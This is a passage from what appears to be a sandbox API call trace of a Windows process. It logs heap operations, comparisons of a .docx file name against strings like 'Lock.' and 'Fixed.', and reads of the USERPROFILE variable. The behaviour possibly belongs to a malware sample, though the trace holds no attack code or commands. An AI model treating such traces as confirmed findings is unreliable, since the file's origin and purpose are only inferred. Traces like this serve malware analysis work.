lpString2="Lock.", cchCount2=5) returned 3 [0215.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gP BwWKbX.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P BwWKbX.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" BwWKbX.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BwWKbX.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wWKbX.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WKbX.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KbX.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bX.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0215.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0215.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0215.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0215.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0215.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0215.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0215.725] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0215.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0215.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0215.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0215.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0215.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0215.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0215.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0215.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0215.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0215.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0215.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0215.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2a) returned 0x2a73178 [0215.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0215.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="faIAqUgP BwWKbX.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aIAqUgP BwWKbX.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IAqUgP BwWKbX.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AqUgP BwWKbX.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qUgP BwWKbX.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UgP BwWKbX.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gP BwWKbX.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P BwWKbX.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" BwWKbX.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BwWKbX.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wWKbX.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WKbX.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KbX.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bX.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a734f8 [0215.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a734f8 | out: hHeap=0x2af0000) returned 1 [0215.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0215.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0215.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0215.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0215.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0215.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0215.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0215.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0215.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0215.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0215.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0215.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.727] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0215.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0215.727] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0215.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0215.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0215.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72358 [0215.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0215.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0215.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0215.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0215.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0215.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0215.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0215.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0215.728] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0f8 [0215.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0215.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae70 [0215.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0215.728] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0215.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0215.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0215.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0215.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0215.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0215.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0215.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0215.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0215.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0215.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0215.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x38548a8 [0215.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0215.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0215.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0215.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0215.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0215.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0215.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0215.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0215.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0215.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72208 [0215.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0215.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0215.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0215.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0215.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0215.729] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0e0 [0215.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0215.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab020 [0215.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0215.730] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0215.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0215.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0215.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0215.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0215.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0215.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0215.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0215.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0215.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0215.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0215.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0215.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854290 [0215.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0215.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0215.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0215.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0215.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0215.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0215.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0215.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72268 [0215.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0215.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0215.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0215.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721e8 [0215.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0215.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0215.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae40 [0215.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0215.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0215.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0215.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0215.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0215.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0215.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0215.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0215.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0215.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0215.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0215.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0215.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0215.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0215.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0215.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0215.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0215.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0215.732] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0215.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0215.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0215.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0215.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0215.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0215.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0215.733] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0215.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0215.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0215.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0215.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0215.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0215.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0215.733] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 